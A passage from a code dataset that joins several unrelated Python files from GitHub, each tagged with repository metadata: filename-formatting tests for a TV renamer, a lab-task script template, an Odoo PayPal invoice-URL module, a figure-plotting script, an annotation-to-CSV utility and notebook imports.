                             'person.of.interest_.s04e10_.x264-w4f.mp4')
            # *
            name = 'person.of.interest*.s04e10*.x264-w4f.mp4'
            self.assertEqual(formatter._make_valid_filename(name),
                             'person.of.interest_.s04e10_.x264-w4f.mp4')
            # ?
            name = 'person.of.interest?.s04e10?.x264-w4f.mp4'
            self.assertEqual(formatter._make_valid_filename(name),
                             'person.of.interest_.s04e10_.x264-w4f.mp4')
            # "
            name = 'person.of.interest".s04e10".x264-w4f.mp4'
            self.assertEqual(formatter._make_valid_filename(name),
                             'person.of.interest_.s04e10_.x264-w4f.mp4')
            # <
            name = 'person.of.interest<.s04e10<.x264-w4f.mp4'
            self.assertEqual(formatter._make_valid_filename(name),
                             'person.of.interest_.s04e10_.x264-w4f.mp4')
            # >
            name = 'person.of.interest>.s04e10>.x264-w4f.mp4'
            self.assertEqual(formatter._make_valid_filename(name),
                             'person.of.interest_.s04e10_.x264-w4f.mp4')
            # |
            name = 'person.of.interest|.s04e10|.x264-w4f.mp4'
            self.assertEqual(formatter._make_valid_filename(name),
                             'person.of.interest_.s04e10_.x264-w4f.mp4')
            # major naming issues
            name = '\\/:*?<Evil>|\"'
            self.assertEqual(formatter._make_valid_filename(name),
                             '______Evil___')
            # Windows reserved device name gets an underscore prefix.
            name = 'CON.avi'
            self.assertEqual(formatter._make_valid_filename(name),
                             '_CON.avi')
            # Over-long names are truncated (extension preserved).
            name = 'MJR1uc9JlkfFrnBjFlUQCpICUc6wl93wie4PmbjYbwj7j4j9MMrsWNG0yOJiheAwZkpRMgP1KBICoFN3ZztkciqZlmaXUeToJuh6hT9cTHXqoghCbRVUNxP6JzIqrXB.OHcpQb0vojDr5fIMPu3Fgjzh9kaG3WYE9zHUmC8co2FjNBUiBIKHAMB73HBXpF4Y54eCg0CXTB29hhkDwbRsvWYn0i9tPE6kTsgVyQNb36S71aDqvuMmZp0ll3YIsrZXX'  # noqa
            self.assertEqual(formatter._make_valid_filename(name),
                             'MJR1uc9JlkfFrnBjFlUQCpICUc6wl93wie4PmbjYbwj7j4j9MMrsWNG0yOJiheAwZkpRMgP1KBICoFN3ZztkciqZlmaXUeToJuh6hT9cTHXqoghCbRVUNxP6JzIqrXB.OHcpQb0vojDr5fIMPu3Fgjzh9kaG3WYE9zHUmC8co2FjNBUiBIKHAMB73HBXpF4Y54eCg0CXTB29hhkDwbRsvWYn0i9tPE6kTsgVyQNb36S71aDqvuMmZp0ll3YIsr')  # noqa
            name = 'ykgoibnaioyabclikamnxbikiaujdjkvlhywrnhtyzbylugtcaxomlrbtpnqgvscrhqvkydnohwvhiusnkrjyrueqnjcpvwzuhpitmrtwwzmptkaxzgwzzjdgwlwswozniwilazcbrokqnlqdjnwoykuiejjvizpoiitcoiqvzuvcuwmcfsw.jfvxeujzshxjhcllrsemormrfknzfsoczbuisqmexamsrzifuoxjxysicikfgegjwkojyrokijxyefekyilqsnwaqkgiyuayasac'  # noqa
            self.assertEqual(formatter._make_valid_filename(name),
                             'ykgoibnaioyabclikamnxbikiaujdjkvlhywrnhtyzbylugtcaxomlrbtpnqgvscrhqvkydnohwvhiusnkrjyrueqnjcpvwzuhpitmrtwwzmptkaxzgwzzjdgwlwswozniwilazcbrokqnlqdjnwoykui.jfvxeujzshxjhcllrsemormrfknzfsoczbuisqmexamsrzifuoxjxysicikfgegjwkojyrokijxyefekyilqsnwaqkgiyuayasac')  # noqa
    def test_format_filename(self):
        """format_filename fills the configured episode template and
        applies output replacements."""
        self.CONF.set_override(
            'filename_format_ep',
            'S%(seasonnumber)02dE%(episode)s-%(episodename)s%(ext)s')
        self.CONF.set_override('output_filename_replacements',
                               [])
        self.assertEqual(formatter.format_filename(None, 2, [2],
                                                   ['The Codpiece Topology'],
                                                   '.avi'),
                         'S02E02-The Codpiece Topology.avi')
        # Series name is title-cased when included in the template.
        self.CONF.set_override(
            'filename_format_ep',
            '%(seriesname)s - S%(seasonnumber)02dE%(episode)s-%(episodename)s%(ext)s')  # noqa
        self.assertEqual(formatter.format_filename('the big bang theory',
                                                   2, [2],
                                                   ['The Codpiece Topology'],
                                                   '.avi'),
                         'The Big Bang Theory - S02E02-The Codpiece Topology.avi')  # noqa
        self.CONF.set_override(
            'filename_format_ep',
            '%(seriesname)s - S%(seasonnumber)02dE%(episode)s-%(episodename)s%(ext)s')  # noqa
        self.CONF.set_override('output_filename_replacements',
                               [{'match': 'Heartland (2007) (CA)',
                                 'replacement': 'Heartland (CA)'}])
        self.assertEqual(formatter.format_filename('Heartland (2007) (CA)',
                                                   2, [2],
                                                   ['Letting Go'],
                                                   '.mp4'),
                         'Heartland (CA) - S02E02-Letting Go.mp4')
    def test_format_dirname(self):
        """format_dirname fills the configured directory template."""
        self.CONF.set_override(
            'directory_name_format',
            '%(seriesname)s/Season %(seasonnumber)02d')
        self.assertEqual(formatter.format_dirname('Sample Series', 2),
                         'Sample Series/Season 02')
    @mock.patch('os.path.isdir')
    def test_find_library(self, mock_isdir):
        """find_library returns the first configured library containing
        the series path, else the default library."""
        series_path = 'The Big Bang Theory/Season 01'
        locations = ['\\NAS/Share/Video/Current',
                     '\\NAS/Share/Video/Offair',
                     '/local/video']
        default_location = '\\NAS/Share/Video/TBD'
        self.CONF.set_override('libraries', locations)
        self.CONF.set_override('default_library', default_location)
        mock_isdir.return_value = True
        result = formatter.find_library(series_path)
        self.assertEqual(result, '\\NAS/Share/Video/Current')
        mock_isdir.return_value = False
        result = formatter.find_library(series_path)
        self.assertEqual(result, default_location)
        # Six isdir probes suggest two checks per library; only the last
        # library reports True -- TODO confirm against find_library.
        mock_isdir.side_effect = (False, False, False, False, False, True)
        result = formatter.find_library(series_path)
        self.assertEqual(result, '/local/video')
| shad7/tvrenamer | tvrenamer/tests/core/test_formatter.py | test_formatter.py | py | 11,698 | python | en | code | 0 | github-code | 50 |
32677128650 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# -------------------------------------------
# Name: YOUR NAME
# Version: 0.1
# Notes: ADD UPDATES HERE
# -------------------------------------------
# Imports
import sys, logging
# Path to DBConnect
sys.path.append("../")
# Import DBConnect
import DBConnect
# Path to /opt/boru/plugins
sys.path.append("../boru/plugins")
# Import all plugins.
# You may be required to process plugins to start/finish/suspend/resume a lab.
from plugins import *
# ------------------------------
# main - Called by the scheduler
# ------------------------------
# jsonDoc - Everything passed in from the 'generateStartLabTaskBuffer'(or Finish or Suspend or Resume) function in the scheduler.
def main(jsonDoc):
    """Task entry point invoked by the Boru scheduler.

    jsonDoc -- dict built by the scheduler's generate*LabTaskBuffer
    functions (Start/Finish/Suspend/Resume); always contains 'task_id'.

    Every exit path MUST first set the task status to 'Ready' or
    'Error' via DBConnect.
    """
    # ------------
    # Logger setup
    # ------------
    try:
        logging.basicConfig(filename='/var/log/boru.log', level=logging.INFO,
                            format="%(asctime)s: %(levelname)s: %(message)s")
        log = logging.getLogger('SCRIPT_NAME')
    except Exception as e:
        # No logging, just print, can't log :(
        print("[SCRIPT_NAME] Critical Logger Setup Error: {}".format(str(e)))
        # Exit
        return
    # -----------------------------------
    # Extracting the task_id from jsonDoc
    # -----------------------------------
    # Required to use DBConnect, passed into every jsonDoc.
    taskId = jsonDoc['task_id']
    # Fix: 'accountName' was used below without ever being defined, so
    # both example paths raised NameError.  Pull it from the task
    # document instead.
    # NOTE(review): assumes the scheduler supplies 'account_name' in
    # jsonDoc -- confirm the key name used by the scheduler.
    accountName = jsonDoc.get('account_name', 'unknown')
    # --------------
    # YOUR CODE HERE
    # --------------
    # --------------------------------------------------------------------------------------------------------------------
    # EXAMPLES BELOW
    # --------------------------------------------------------------------------------------------------------------------
    # ----------------------------------------------------------
    # Example of appending 'ERROR' information using 'DBConnect'
    # ----------------------------------------------------------
    # NOTE: This script MUST update the Task Status to 'Error' or 'Ready' before exiting any script.
    try:
        # Deliberate example failure (ZeroDivisionError) showing the
        # error-handling pattern; replace with real work.
        i = 10 / 0
    except Exception as e:
        # Logging
        errorExceptionInfo = "[SCRIPT_NAME] Example Function Error: {}".format(str(e))
        log.exception(errorExceptionInfo)
        # Update task['errorInfo']
        DBConnect.appendTaskErrorInfo(taskId, accountName, "Error: {}".format(str(e)))
        # Update task['taskStatus'] to 'Error'
        DBConnect.setTaskStatusToError(taskId)
        # Exit
        return
    # ------------------------------------------------------------
    # Example of appending 'SUCCESS' information using 'DBConnect'
    # ------------------------------------------------------------
    # NOTE: This script MUST update the Task Status to 'Ready' or 'Error' before exiting any script.
    # Update task['successInfo']
    DBConnect.appendTaskSuccessInfo(taskId, accountName, "Successful Info Here")
    # Update task['taskStatus'] to 'Ready'
    DBConnect.setTaskStatusToReady(taskId)
    # Exit
    return
# -------------------------------------------------------------------------------------------------------------------- | JarekCode/Boru | scripts/scriptTemplate.py | scriptTemplate.py | py | 3,064 | python | en | code | 0 | github-code | 50 |
32538776490 | # -*- coding: utf-8 -*-
# © 2015 Elico corp (www.elico-corp.com)
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from urllib import urlencode
from openerp.osv import fields, osv
class AccountAccount(osv.osv):
    """Extends account.invoice with a computed PayPal "pay now" URL.

    NOTE(review): despite its name, this class inherits 'account.invoice'
    (not account.account) via the old OpenERP osv API.
    """
    _inherit = 'account.invoice'
    def _edi_paypal_url(self, cr, uid, ids, field, arg, context=None):
        """Function-field getter: return {invoice_id: url_or_False}.

        A URL is built only for customer invoices ('out_invoice') whose
        company has a configured PayPal account; all other invoices map
        to False.
        """
        res = dict.fromkeys(ids, False)
        for inv in self.browse(cr, uid, ids, context=context):
            if inv.type == 'out_invoice' and inv.company_id.paypal_account:
                item_name = "%s Invoice %s" % (
                    inv.company_id.name, inv.number or '')
                # urlencode needs bytes on Python 2 for non-ASCII names.
                item_name = item_name.encode('utf-8')
                # PayPal "Buy Now" (_xclick) button parameters; amount is
                # the open residual, not the invoice total.
                params = {
                    "cmd": "_xclick",
                    "business": inv.company_id.paypal_account,
                    "item_name": item_name,
                    "invoice": inv.number,
                    "amount": inv.residual,
                    "currency_code": inv.currency_id.name,
                    "button_subtype": "services",
                    "no_note": "1",
                    "bn": "OpenERP_Invoice_PayNow_" + inv.currency_id.name,
                }
                res[inv.id] = "https://www.paypal.com/cgi-bin/webscr?"\
                    + urlencode(params)
        return res
    _columns = {
        # Computed, non-stored function field exposing the payment URL.
        'paypal_url': fields.function(
            _edi_paypal_url, type='char', string='Paypal Url'),
    }
# Old-API osv models register themselves on instantiation.
AccountAccount()
| Elico-Corp/odoo-addons | payment_utf8/invoice.py | invoice.py | py | 1,457 | python | en | code | 45 | github-code | 50 |
21119618969 | """
Plots figure 2A, boxplot of reported times.
"""
import pickle
import os
import numpy as np
from matplotlib import pyplot as plt
import importlib.util
from fna.tools.visualization.helper import set_global_rcParams
from fna.tools.utils import logger
from fna.tools.utils.data_handling import set_storage_locations
from helper import plotting
from helper import fig_defaults as fig_def
from utils.parameters import ParameterSet
logprint = logger.get_logger(__name__)
def plot_multi_batch(parameters, storage_paths, ax, plot_traces=True):
    """Boxplot of reported times across test batches of ONE learning
    instance, drawn onto *ax*.

    Loads 'Recordings_<label>.data' from the activity directory; on any
    load failure the dataset is logged and skipped (nothing is drawn).
    NOTE(review): plot_traces is currently unused.
    """
    filename = 'Recordings_{}.data'.format(parameters.label)
    try:
        with open(os.path.join(storage_paths['activity'], filename), 'rb') as f:
            data = pickle.load(f)
            reward_times = data['reward_times']
            recorded_data = data['recorded_data']
    except Exception as e:
        logprint.error(f'Exception occured: {str(e)}.\n\tSkipping dataset {parameters.label}')
        return
    # One color per column (up to 6).
    colors = plotting.sns.color_palette('tab10')[:6]
    plotting.boxplot_multitrial(parameters, recorded_data, reward_times, ax, plot_rewards=False, colors=colors)
    test_batches = len(recorded_data['test_epoch'].keys())
    ax.set_title(f"Reported times, {test_batches} trials,\none learning instance")
def plot_multi_instance(parameters, storage_paths, ax, plot_traces=True):
    """Boxplot aggregating recordings across ALL learning instances
    (one per trial id T in the experiment's ParameterSpace), onto *ax*.

    NOTE(review): plot_traces is currently unused, and 'reward_times'
    stored in each file is not used here.
    """
    # Import the experiment's ParameterSpace.py to discover trial ids.
    main_param_file = os.path.join(storage_paths['main'], 'ParameterSpace.py')
    spec = importlib.util.spec_from_file_location("ParameterSpace", main_param_file)
    mod_param = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(mod_param)
    trials = mod_param.ParameterRange['T']
    recorded_data = []
    for trial in trials:
        # Swap the trial suffix '_T=<n>' into this run's label.
        inst_label = parameters.label[:parameters.label.find('_T=')] + f'_T={trial}'
        filename = 'Recordings_{}.data'.format(inst_label)
        try:
            with open(os.path.join(storage_paths['activity'], filename), 'rb') as f:
                data = pickle.load(f)
                recorded_data.append(data['recorded_data'])
        except Exception as e:
            logprint.error(f'Exception occured: {str(e)}.\n\tSkipping dataset (unknown)')
            continue
    plotting.boxplot_multi_instance(parameters, recorded_data, ax)
def run(parameters, display=False, plot=True, save=True, load_inputs=False):
    """Build figure 2A: two side-by-side boxplots (single-instance
    recall times, median recall times over 10 instances) and save them
    as PDF and SVG in the experiment's figures directory.

    NOTE(review): display, plot and load_inputs are accepted for
    interface compatibility with other experiment scripts but unused
    here (save only controls storage-path creation).
    """
    # experiments parameters
    if not isinstance(parameters, ParameterSet):
        parameters = ParameterSet(parameters)
    storage_paths = set_storage_locations(parameters.kernel_pars.data_path, parameters.kernel_pars.data_prefix,
                                          parameters.label, save=save)
    logger.update_log_handles(job_name=parameters.label, path=storage_paths['logs'])
    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=fig_def.figsize['re_fig3s2_boxplot'], sharex=True)
    plot_multi_batch(parameters, storage_paths, axes[0])
    plot_multi_instance(parameters, storage_paths, axes[1])
    n_cols = parameters.net_pars.n_cols
    # Cumulative token durations (ms): y-tick per column boundary.
    token_durations = np.array([sum(parameters.input_pars.misc.token_duration[0:i+1]) for i in range(n_cols)])
    # Use a common y-range so the two panels are comparable.
    ylim_max = max(axes[0].get_ylim()[1], axes[1].get_ylim()[1])
    for _ax in axes:
        _ax.grid(False)
        _ax.set_title(None)
        _ax.set_ylabel(None)
        _ax.set_ylim(0., ylim_max + 200)
        _ax.set_yticks(token_durations)
        # _ax.set_yticks([700., 1400., 2100., 2800.])
        _ax.set_xticklabels(list(range(n_cols)))
        _ax.set_xlabel('Column')
        _ax.yaxis.set_tick_params(labelbottom=True)
    axes[0].set_title('Recall times, \none instance')
    axes[1].set_title('Median recall times,\n10 instances')
    # Left panel carries the shared axis labels; ms converted to s.
    axes[0].set_ylabel('Time (s)')
    # axes[0].set_yticklabels([0.7, 1.4, 2.1, 2.8])
    axes[0].set_yticklabels(np.around(token_durations / 1000., decimals=1))
    axes[1].set_yticklabels([])
    fig.tight_layout()
    fig.savefig(os.path.join(storage_paths['figures'], 'Fig_2A_boxplot{}.pdf'.format(parameters.label)))
    fig.savefig(os.path.join(storage_paths['figures'], 'Fig_2A_boxplot{}.svg'.format(parameters.label)))
| zbarni/re_modular_seqlearn | src/cone_shouval_2021/experiments/plot_fig2_a.py | plot_fig2_a.py | py | 4,089 | python | en | code | 1 | github-code | 50 |
1150928520 | from profile.profile import Profile
from paths.circle import Circle
import kinematics
import numpy as np
###################################################
# Tests a circular path in the profiler.
# Generates the profile, transforms it into
# configuration space, then tests each of the
# configuration space points against the
# original profile.
###################################################
def close(v1, v2, tol=0.0001):
    """Return True if v1 and v2 are within Euclidean distance *tol*.

    np.linalg.norm is already non-negative, so the abs() wrapper the
    original version used was redundant and has been dropped.
    """
    return np.linalg.norm(v1 - v2) < tol
# Initial joint configuration (rad) and link lengths of the 2-DOF arm.
q0 = np.array([0, 3.14 / 3])
l1 = 1
l2 = 2
# End-effector position for the initial configuration.
x0 = kinematics.forward_state(q0[0], q0[1], l1, l2)
# Circle of radius r passing through x0 (center shifted left by r).
r = 0.75
c = Circle(x0[0] - r, x0[1], r, 1)
# Split the path parameters into position / velocity / acceleration.
path = lambda t: c.getPathParams(t)[0:2]
dpath = lambda t: c.getPathParams(t)[2:4]
d2path = lambda t: c.getPathParams(t)[4:6]
p_original = Profile(path, dpath, d2path, 3)
p_transformed = Profile(path, dpath, d2path, 3)
# Forward kinematics, Jacobian and Hessian as functions of a joint
# vector x = (q1, q2); used to map the profile into joint space.
qfn = lambda x: kinematics.forward_state(x[0], x[1], l1, l2)
jfn = lambda x: kinematics.forward_jacobian(x[0], x[1], l1, l2)
hfn = lambda x: kinematics.forward_hessian(x[0], x[1], l1, l2)
p_transformed.transform(q0, qfn, jfn, hfn)
# Compare each transformed (joint-space) point, mapped back through
# forward kinematics, against the original Cartesian profile point.
i = 0
with open("log.csv", "w+") as f:
    f.write(", ".join(["x_tf", "y_tf", "x_or", "y_or"]) + '\n')
    for p1, p2 in zip(p_original.path, p_transformed.path):
        q_tf = kinematics.forward_state(p2.q[0], p2.q[1], l1, l2)
        q_or = np.array([p1.q[0], p1.q[1]])
        f.write(", ".join(map(str, np.concatenate([q_tf, q_or]))) + '\n')
        if not close(q_tf, q_or):
            # First mismatch: report how many steps agreed, then stop.
            print("Within tolerance for " + str(i) + " time steps")
            # print(p1)
            # print(p2)
            # print(str(q_tf) + " != " + str(q_or))
            break
        else:
            i += 1
    else:
print("Within tolerance for entire time") | lessthantrue/RobotProjects | double_joint_arm/profile_test.py | profile_test.py | py | 1,738 | python | en | code | 3 | github-code | 50 |
20068340110 | from operator import itemgetter
import os
import json
import re
import flatland as fl
from flatland.validation import IsEmail, Converted, Validator
import database
def _load_json(name):
    """Parse a JSON reference-data file that lives beside this module."""
    here = os.path.dirname(__file__)
    with open(os.path.join(here, name), "rb") as f:
        return json.load(f)
class EnumValue(Validator):
    """Flatland validator: the element's value must be one of its
    declared valid_values (elements without valid_values always pass).
    """
    # NOTE(review): '%(u)s' looks like a mangled placeholder (probably
    # meant %(value)s with a u'' prefix) -- confirm against flatland's
    # message interpolation before changing.
    fail = fl.validation.base.N_(u'%(u)s is not a valid value for %(label)s.')
    def validate(self, element, state):
        if element.valid_values:
            if element.value not in element.valid_values:
                return self.note_error(element, state, 'fail')
        return True
class IsPhone(Validator):
    """Flatland validator: phone numbers must be three groups of digits
    separated by single spaces (e.g. '999 000 555')."""
    fail = fl.validation.base.N_(
        u"%(label)s is not valid. "
        "Please enter three groups of digits separated by spaces.")
    # Compiled once at class creation; anchored at both ends.
    phone_pattern = re.compile(r'^\d+ \d+ \d+$')
    def validate(self, element, state):
        if self.phone_pattern.match(element.value) is None:
            return self.note_error(element, state, 'fail')
        return True
# Reference data loaded once at import time from the refdata/ JSON files.
# country: {iso_code: country_name}
country = {item["id"]: item["name"] for item in
           _load_json("refdata/countries.json")}
# sort by country name for select option
# [("iso code", "country_name"),]
sorted_country_codes = sorted(country.items(), key=itemgetter(1))
# ["iso_code", "iso_code"]
sorted_country_codes = [c[0] for c in sorted_country_codes]
personal_title = _load_json("refdata/titles.json")
language = _load_json("refdata/languages.json")
secretariat = _load_json("refdata/secretariat.json")
# category keeps the full record per id; category_labels is id -> name.
category = {c["id"]: c for c in _load_json("refdata/categories.json")}
category_labels = {c["id"]: c["name"] for c in category.values()}
region = {item["id"]: item["name"]
          for item in _load_json("refdata/regions.json")}
# sort by region name for select option
sorted_regions = sorted(region.items(), key=itemgetter(1))
sorted_regions = [r[0] for r in sorted_regions]
fee = {item["id"]: item["name"] for item in
       _load_json("refdata/fee.json")}
# Shared field bases used throughout the schemas below.
CommonString = fl.String.using(optional=True)
CommonEnum = fl.Enum.using(optional=True) \
    .including_validators(EnumValue()) \
    .with_properties(widget="select")
# NOTE(review): an earlier comment here claimed CommonBoolean uses
# optional=False, but the code below clearly sets optional=True -- an
# unchecked checkbox is therefore allowed.
CommonBoolean = fl.Boolean.using(optional=True).with_properties(widget="checkbox")
CommonDict = fl.Dict.with_properties(widget="group")
# Flatland schema describing the person registration form: four groups
# (personal contact details, who the person represents, per-meeting
# status flags, free-text notes).  Comments are only placed after
# comma/paren lines because backslash continuations cannot be followed
# by a comment line.
_PersonSchemaDefinition = fl.Dict.with_properties(widget="schema") \
    .of(
        # --- group 1: personal contact details -------------------------
        CommonDict.named("personal") \
            .using(label="") \
            .of(
                CommonEnum.named("name_title") \
                    .valued(*sorted(personal_title.keys())) \
                    .using(label=u"Personal title") \
                    .with_properties(attr={"autofocus": ""}),
                CommonString.named("first_name") \
                    .using(optional=False,
                           label=u"First name"),
                CommonString.named("last_name") \
                    .using(optional=False,
                           label=u"Last name"),
                CommonEnum.named("language") \
                    .valued(*sorted(language.keys())) \
                    .using(label=u"Language") \
                    .with_properties(value_labels=language),
                CommonString.named("address") \
                    .using(label=u"Address") \
                    .with_properties(widget="textarea"),
                CommonString.named("email") \
                    .using(label=u"Email") \
                    .including_validators(IsEmail()) \
                    .with_properties(attr={"type": "email"}),
                CommonString.named("phone") \
                    .using(label=u"Phone") \
                    .with_properties(attr={
                        "type": "tel",
                        "pattern": r"^\d+ \d+ \d+$",
                        "title": "(999 000 555)",
                    }),
                CommonString.named("cellular") \
                    .using(label=u"Cellular"),
                CommonString.named("fax") \
                    .using(label=u"Fax"),
                CommonString.named("place") \
                    .using(label=u"Place"),
                CommonEnum.named("country") \
                    .valued(*sorted_country_codes) \
                    .using(label=u"Country") \
                    .with_properties(value_labels=country),
                CommonEnum.named("category") \
                    .valued(*sorted(category.keys())) \
                    .using(label=u"Category") \
                    .with_properties(value_labels=category_labels),
                CommonEnum.named("fee") \
                    .using(label=u"Fee") \
                    .valued(*sorted(fee.keys())) \
                    .with_properties(value_labels=fee)
            ),
        # --- group 2: entity the person represents ----------------------
        CommonDict.named("representing") \
            .using(label=u"Representing") \
            .of(
                CommonEnum.named("country") \
                    .valued(*sorted_country_codes) \
                    .using(label=u"Country") \
                    .with_properties(value_labels=country),
                CommonEnum.named("region") \
                    .valued(*sorted_regions) \
                    .using(label=u"Region") \
                    .with_properties(value_labels=region),
                CommonString.named("organization") \
                    .using(label=u"Organization") \
                    .with_properties(widget="textarea"),
                CommonBoolean.named("organization_show") \
                    .using(label=u"Show in address"),
            ),
        # --- group 3: per-meeting administrative flags ------------------
        CommonDict.named("meeting_flags") \
            .using(label=u"Meeting flags") \
            .of(
                CommonBoolean.named("sponsored") \
                    .using(label=u"Sponsored"),
                CommonBoolean.named("finance_subcommittee") \
                    .using(label=u"Finance Subcommittee"),
                CommonBoolean.named("credentials") \
                    .using(label=u"Credentials"),
                CommonBoolean.named("approval") \
                    .using(label=u"Approval"),
                CommonBoolean.named("invitation") \
                    .using(label=u"Invitation"),
                CommonBoolean.named("web_alert") \
                    .using(label=u"Web alert"),
                CommonBoolean.named("verified") \
                    .using(label=u"Verified"),
                fl.Date.named("acknowledged") \
                    .using(label=u"Date acknowledged",
                           optional=True) \
                    .including_validators(Converted(incorrect=u"%(label)s is not "
                                                              "a valid date")),
                CommonBoolean.named("attended") \
                    .using(label=u"Attended"),
            ),
        # --- group 4: free-text notes -----------------------------------
        CommonDict.named("more_info") \
            .using(label=u"Additional information") \
            .of(
                CommonString.named("text") \
                    .using(label=u"") \
                    .with_properties(widget="textarea"),
            ),
    )
class PersonSchema(_PersonSchemaDefinition):
    """Person form schema whose .value unwraps into a Person object."""
    @property
    def value(self):
        # Wrap the plain dict produced by flatland in the richer Person.
        return Person(super(PersonSchema, self).value)
class Person(dict):
    """Registration record: a nested dict (personal / representing /
    meeting_flags / more_info) plus display helpers that translate
    reference-data ids into human-readable labels."""
    # Database row id; set by from_flat(), None for unsaved instances.
    id = None
    @staticmethod
    def from_flat(person_row):
        """Build a Person from a flat database row, preserving its id."""
        person = PersonSchema.from_flat(person_row).value
        person.id = person_row.id
        return person
    @classmethod
    def get_or_404(cls, person_id):
        """Load a Person by id or abort the request with 404."""
        return cls.from_flat(database.get_person_or_404(person_id))
    @property
    def name(self):
        """Full display name: '<title> <first> <last>'."""
        return "%s %s %s" % (
            self["personal"]["name_title"],
            self["personal"]["first_name"],
            self["personal"]["last_name"],
        )
    @property
    def has_photo(self):
        """True if the stored row carries a non-empty photo_id."""
        assert self.id is not None
        person_row = database.get_person_or_404(self.id)
        return bool(person_row.get("photo_id", ""))
    def representing(self, description=None):
        """Human-readable description of who the person represents,
        varying by category id (see refdata/categories.json)."""
        category_id = self["personal"]["category"]
        representing = ""
        if category_id == "10":
            representing = "%s - %s" % (
                region[self["representing"]["region"]],
                country[self["representing"]["country"]],
            )
        elif category_id in ["20", "30", "40"]:
            representing = country[self["representing"]["country"]]
        elif category_id in ["98", "99"]:
            representing = description or category[category_id]["name"]
        else:
            representing = self["representing"]["organization"]
        return representing
    @property
    def category(self):
        """Full category record (dict), or '' if the id is unknown."""
        return category.get(self["personal"]["category"], "")
    @property
    def region(self):
        return region.get(self["representing"]["region"], "")
    @property
    def country(self):
        """Name of the represented country."""
        return country.get(self["representing"]["country"], "")
    @property
    def personal_country(self):
        """Name of the person's own country (from the personal group)."""
        return country.get(self["personal"]["country"], "")
    @property
    def fee(self):
        return fee.get(self["personal"]["fee"], "")
    @property
    def language(self):
        return language.get(self["personal"]["language"], "")
    @property
    def room_list(self):
        """Label used on the room list, by category; None if n/a."""
        category_id = self["personal"]["category"]
        room_list = None
        if category_id == "10":
            room_list = "%s - %s" % (
                region[self["representing"]["region"]],
                country[self["representing"]["country"]],
            )
        elif category_id in ("20", "30", "40"):
            room_list = country[self["representing"]["country"]]
        # NOTE(review): category_id is a *string*; 'str > int' is always
        # True on Python 2 (so this branch catches everything above) and
        # raises TypeError on Python 3.
        elif category_id > 40:
            room_list = self["representing"]["organization"]
        return room_list
    @property
    def ref_list(self):
        """Label used on the reference list, by category; None if n/a."""
        category_id = self["personal"]["category"]
        ref_list = None
        if category_id == "10":
            ref_list = "%s-%s" % (
                region[self["representing"]["region"]],
                country[self["representing"]["country"]],
            )
        elif category_id in ("20", "30", "40"):
            ref_list = country[self["representing"]["country"]]
        elif category_id in ("98", "99"):
            ref_list = self["representing"]["organization"]
        return ref_list
    @property
    def verifpart(self):
        """Label used on the verified-participants list: country for
        delegations (categories 10-40), organization otherwise."""
        category_id = self["personal"]["category"]
        verifpart = None
        if category_id in ["10", "20", "30", "40"]:
            verifpart = country[self["representing"]["country"]]
        else:
            verifpart = self["representing"]["organization"]
        return verifpart
# Flatland schema for the "send mail" form: to/cc/subject/message.
# Only 'cc' is optional; 'message' keeps surrounding whitespace
# (strip=False) so formatting in the body survives.
MailSchema = fl.Dict.with_properties(widget="mail") \
    .of(
        CommonString.named("to") \
            .using(label=u"To", optional=False) \
            .including_validators(IsEmail()) \
            .with_properties(widget="input"),
        CommonString.named("cc") \
            .using(label=u"Cc") \
            .including_validators(IsEmail())
            .with_properties(widget="input"),
        CommonString.named("subject") \
            .using(label=u"Subject", optional=False) \
            .with_properties(widget="input"),
        CommonString.named("message") \
            .using(label=u"Message",
                   optional=False,
                   strip=False) \
            .with_properties(widget="textarea")
    )
from flatland.signals import validator_validated
from flatland.schema.base import NotEmpty
# Signal hook: whenever flatland's built-in NotEmpty validator fails,
# attach a friendlier '<label> is required' message to the element.
@validator_validated.connect
def validated(sender, element, result, **kwargs):
    if sender is NotEmpty:
        if not result:
            # Fall back to the element name when no label is defined.
            label = getattr(element, 'label', element.name)
            element.add_error(u"%s is required" % label)
| dincamihai/cites-meetings | cites/schema.py | schema.py | py | 11,640 | python | en | code | 1 | github-code | 50 |
10838901651 | import os
import sys
def extract_txt(folder):
    """Collapse per-frame ``.txt`` annotation files into one CSV per
    subdirectory of *folder*.

    Frame files named like ``00000012.txt`` are concatenated in frame
    order into ``<subdirectory>.csv``; gaps in the frame numbering are
    padded with blank rows.  A leading ``00000000.txt`` is treated as a
    dummy frame and skipped (the row counter then starts at 1, matching
    the original behavior).  Each file's lines are joined with commas
    and keep their trailing newlines, exactly as before (one annotation
    record per file is assumed).

    Fixes over the previous version:
    - subdirectories are detected with ``os.path.isdir`` instead of
      counting '.' characters in the path (which mis-skipped everything
      whenever *folder* itself contained a dot, e.g. './data');
    - extensions are matched with ``os.path.splitext`` (the old
      ``name.split('.')[1]`` crashed on dot-less names and mis-matched
      names with several dots);
    - listings are sorted, since ``os.listdir`` order is arbitrary but
      the frame-padding logic requires ascending frame numbers;
    - empty subdirectories no longer raise IndexError.
    """
    for entry in sorted(os.listdir(folder)):
        subdir = os.path.join(folder, entry)
        if not os.path.isdir(subdir):
            print('Skipped: ', subdir)
            continue
        file_list = sorted(
            name for name in os.listdir(subdir)
            if os.path.splitext(name)[1] == '.txt'
        )
        if not file_list:
            print('Skipped: ', subdir)
            continue
        with open(subdir + '.csv', 'w') as out:
            # Skip the dummy first frame if present; start counting at 1
            # so real frame numbers still line up.
            if file_list[0] == '00000000.txt':
                file_list.pop(0)
                row = 1
            else:
                row = 0
            for file_name in file_list:
                frame = int(os.path.splitext(file_name)[0])
                if frame != row:
                    # Pad skipped frame numbers with blank rows.
                    out.write('\n' * (frame - row))
                    row = frame
                with open(os.path.join(subdir, file_name), 'r') as text:
                    content = text.readlines()
                out.write(','.join(content))
                row += 1
        print('Extracted: ', subdir)
# Command-line entry point: ``python extract_txt.py <folder>``.
# Silently does nothing when no folder argument is given.
if __name__=='__main__':
    if len(sys.argv) > 1:
        folder = sys.argv[1]
        extract_txt(folder)
| realtimshady1/Koalafinder | utils/extract_txt.py | extract_txt.py | py | 1,159 | python | en | code | 1 | github-code | 50 |
30211999203 |
# coding: utf-8
# In[56]:
# package imports
#basics
import numpy as np
import pandas as pd
import ast
#misc
import gc
import time
import warnings
#viz
import matplotlib.pyplot as plt
import seaborn as sns
import matplotlib.gridspec as gridspec
import matplotlib.gridspec as gridspec
#settings
start_time=time.time()
color = sns.color_palette()
sns.set_style("dark")
import re
import warnings
warnings.filterwarnings("ignore")
